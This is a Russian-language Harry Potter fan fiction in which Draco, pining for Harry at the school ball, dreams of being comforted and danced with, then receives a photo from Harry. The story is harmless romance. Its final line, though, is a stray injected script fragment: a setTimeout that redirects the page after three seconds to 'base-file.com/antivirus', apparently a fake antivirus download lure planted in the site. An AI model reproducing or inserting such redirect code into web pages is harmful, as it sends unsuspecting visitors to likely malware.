А музыка звучит...

Автор: Кот Бегемот
Авторские права: Все права на персонажей принадлежат госпоже Роулинг (пусть ими подавится), автор фан-фика не претендует на них и не пытается извлечь никакой прибыли (кроме продолжительных бурных аплодисментов) из своего рассказа.
Рейтинг: PG-13 (никакого намека на порно)
Бета - ридер: МиДэрхен (образец терпеливости)

"... Музыка - это такое чарующее сочетание звуков,
услышав которые, мы становимся бессильными..."

 

Драко сидел за слизеринским столом, тоскливо уставившись в свою тарелку. Школьный бал, посвященный окончанию очередного учебного года, был в самом разгаре - студенты, поддавшись весеннему настроению, уже давно разбились на пары и медленно двигались под звуки опьяняюще нежной мелодии, разрывавшей душу молодого Малфоя.

- Ты так и будешь весь вечер сидеть с надутым видом? - спросила Панси, чуть раскрасневшаяся от нескольких кружек масляного эля. - Может, потанцуем?

- У меня ноги болят, - пробурчал Драко, резким движением сбрасывая ласково опустившуюся на его плечо руку Паркинсон.

Панси фыркнула и с видом оскорбленного достоинства направилась к Бэддоку, который просиял от уделенного ему внимания. Драко лгал: больше всего на свете ему хотелось броситься в гущу студентов и двигаться с ними в унисон под медленную мелодию, мягко разливавшуюся в Главном зале Хогвардса. Но не с Паркинсон, и ни с кем из знакомых учеников. Только один человек мог подарить ему те счастливые мгновения, о которых Драко мог только мечтать. Юноша с серебристыми волосами поднял взгляд и стал печально разглядывать танцующих студентов. Грейнджер вальсировала с неуклюжим Уизли, постоянно наступавшим ей на ноги, Поттер и Джинни нежно смотрели друг другу в глаза и двигались очень медленно, словно плыли по тихой и беззаботной реке счастья и любви. Даже Крабб и Гойл, вырядившись в парадные мантии, сумели найти себе пару, и на их вечно пустых лицах появилось слабое выражение радости. Казалось, никто не замечал одинокого мальчика, в холодной душе которого затаилась тоска и боль чувства, которое не могло найти выход - любви к человеку, который об этом даже не догадывался. В припадке безумного отчаяния Драко отшвырнул тарелку и выбежал, расталкивая на пути удивленных учеников. Ему хотелось как можно быстрее покинуть этот зал, где у него так жестоко отняли крупицы так искренне желаемого счастья. Он вбежал в свою спальню, задыхаясь, бросился на кровать, и закрыл наполняющиеся слезами глаза.

... Кто-то мягко опустился на постель Малфоя и нежно дотронулся до его волос.

- Драко, что случилось? - этот голос он узнал бы из тысячи.

- Уходи, Поттер, это тебя не касается, - простонал Малфой, переворачиваясь на кровати.

Гарри не шелохнулся, продолжая смотреть на Драко своими изумрудными глазами. Что-то неуловимое промелькнуло во взгляде Поттера, какая-то тихая печаль и тоска отразилась на лице.

- Уходи, - еле слышно повторил Драко.

- Я знаю, чувствую, что тебе больно, - прошептал Гарри, грустно заглядывая в серые глаза Малфоя, словно пытаясь найти в них подтверждение своих догадок.

- Что ты можешь знать о моей боли? - закричал Драко, в отчаянном порыве спрыгивая с кровати. Он отвернулся от Поттера и прижал руки к груди - ледяная волна опустошенности, казалось, навечно сковала худую фигурку бледного юноши с серебристыми волосами.

- Что ты знаешь? - повторил он чуть слышно. - Как ты можешь понять и ощутить то чувство, которое медленно уничтожает меня изнутри? Думаешь, это легко - видеть тебя каждый день на занятиях и тренировках, ощущать на себе твой полный ненависти брезгливый взгляд, слышать беззаботный и радостный смех, к которому не можешь присоединиться? Я каждую ночь засыпаю только с одной просьбой к великому Мерлину: пусть мне приснится Мальчик-Который-Выжил, чтобы хотя бы в грезах и мечтах мы могли быть вместе, но даже сны смеются надо мной, оставаясь глухими к мольбам. Мы с тобой просыпаемся утром почти одновременно, но если тебя наполняет радость - ведь через несколько минут ты сможешь обнять свою Джинни и сказать ей слова любви, - то у меня на душе становится еще холоднее от жестокой несправедливости судьбы. Никогда я не смогу дотронуться до твоего тела, не получив при этом презрительный взгляд и насмешку в ответ, никогда не смогу ощутить прикосновение твоих губ - я навечно обречен скрывать ото всех свои мысли, не давая выхода чувствам. Но у меня есть право любить тебя, Гарри, и его никто не отнимет. Даже ты!

От разыгравшейся в нем невероятной бури эмоций Драко дрожал, ему хотелось выбежать из холодной спальни Слизеринского факультета и улететь как можно дальше из Хогвардса, превратившегося в ад для совсем еще юной души подростка, но ноги не могли двинуться с места, словно невидимая рука злого волшебника сковала их льдом. Гарри бесшумно поднялся с кровати и подошел к сгорбленной фигурке хрупкого человечка. Драко почувствовал, как теплые ладони Поттера нежно вытерли несколько предательских слез с его холодного подбородка, а потом неуклюже обхватили талию Малфоя и осторожно прижали к Мальчику-Который-Выжил.

- Я не буду ненавидеть тебя за это, - Малфой почувствовал горячее дыхание Гарри, нежно шептавшего эти слова ему на ухо. - Но никогда не смогу ответить на твои чувства, Драко.

- Я ни о чем не прошу, Гарри, - чуть слышно выдохнул юноша. - Просто побудь со мной несколько минут, дай мне возможность запомнить эти мгновения, быть может, самые счастливые в моей жизни.

Драко нежно обхватил руками талию Гарри и прижался к нему, склоняя голову на его плечо. Робкие звуки какой-то мелодии нарушили тишину комнаты, было совершенно непонятно, откуда они доносятся и ...

- Ты слышишь, Гарри? - прошептал Драко, почему-то не особо надеясь на ответ.

А музыка звучала все громче, эхом отдаваясь в маленькой слизеринской спальне и беспощадно растапливая ледяные оковы, удерживающие Малфоя.

- Это мелодия твоего сердца, Драко, - ответил Гарри, несмело двигаясь под неизвестную музыку, нежно разливающуюся вокруг их странной для чужого взгляда пары.

А она зазвучала еще громче, принося уют и тепло в холодную пустоту души юного Малфоя.

Драко открыл глаза - всего лишь сон, мечта, греза, но он был благодарен судьбе даже за это : ведь он ощутил чудные мгновения счастья. Пусть Гарри и не было сейчас рядом с ним, но Малфой запомнил каждую секунду прикосновений к своей любви, такой страшной и запретной, как Темный лес около Хогвардса.

- Эй, Драко, там тебя спрашивают, - в дверь спальни просунулась голова Бэддока.

Малфой неохотно спустился вниз - ему не хотелось ни на мгновение расставаться со своими воспоминаниями, но это чувство мгновенно исчезло, когда около входа в подземелье Слизеринского факультета он увидел фигуру Гарри.

- Пришел поиграть в шахматы, Поттер? - привычным тоном процедил Драко. - Научи этой забаве свою прелестную Уизли, будет чем заняться по вечерам в тесном семейном кругу.

Гарри ничего не ответил и, прежде чем Драко успел отреагировать, сунул в карман робы слизеринца маленький клочок бумаги и убежал прочь. Малфой недоуменно вынул листок, оказавшийся небольшой фотографией - виновато улыбаясь и смущенно пряча глаза, с нее на юношу смотрело лицо Поттера:

"Сохрани любовь в своем сердце, Гарри".

А музыка зазвучала еще громче...

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>